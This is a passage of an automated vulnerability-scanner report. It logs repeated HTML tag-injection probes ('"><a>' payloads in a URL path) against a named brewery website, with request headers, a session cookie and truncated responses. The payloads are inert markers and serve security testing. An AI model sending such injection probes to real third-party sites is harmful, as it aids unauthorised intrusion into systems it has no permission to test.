GET /facebook21e10"><a>2532c6c50e8/content/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:52 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c9b"><a>1c3467f82f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookb8c9b"><a>1c3467f82f1/content/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:28 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7836"><a>bb24dd3b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf7836"><a>bb24dd3b3b/content/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:29 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67062"><a>59511a09909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook67062"><a>59511a09909/content/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:28 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fe0"><a>2eb4b172801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook31fe0"><a>2eb4b172801/content/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d2"><a>1133f8e8031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf53d2"><a>1133f8e8031/content/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:34 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704d2"><a>ebeab4721f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook704d2"><a>ebeab4721f5/content/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:38 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1594"><a>1401768ab81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooka1594"><a>1401768ab81/content/css/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:52 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f005"><a>fa78dd29b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook9f005"><a>fa78dd29b61/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:00 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe47"><a>8cda79bb80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookbbe47"><a>8cda79bb80c/content/css/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8ba"><a>7af1c205d94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook7b8ba"><a>7af1c205d94/content/css/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:44 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ab5"><a>a58806edc78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook44ab5"><a>a58806edc78/content/css/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbed"><a>dadadead8f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookfbbed"><a>dadadead8f3/content/css/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:44 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233db"><a>e5397f42874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook233db"><a>e5397f42874/content/css/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768c"><a>f97c43a5168 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook6768c"><a>f97c43a5168/content/css/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc93"><a>f6122ef7935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook5bc93"><a>f6122ef7935/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ebb"><a>62bdc34784c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookb2ebb"><a>62bdc34784c/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/facebook/ Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><a>a5d48e2d007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooke124c"><a>a5d48e2d007/content/img/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3145"><a>00514f46b2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebooka3145"><a>00514f46b2c/content/img/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf7c"><a>481ef2418ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook9cf7c"><a>481ef2418ab/content/img/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcbba"><a>275f83cf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookdcbba"><a>275f83cf66/content/img/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c44"><a>859f4735ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf6c44"><a>859f4735ae1/content/img/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:51 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88bc"><a>053c5e72b0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebookf88bc"><a>053c5e72b0f/content/img/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:52:52 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2eb"><a>bc8073585ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
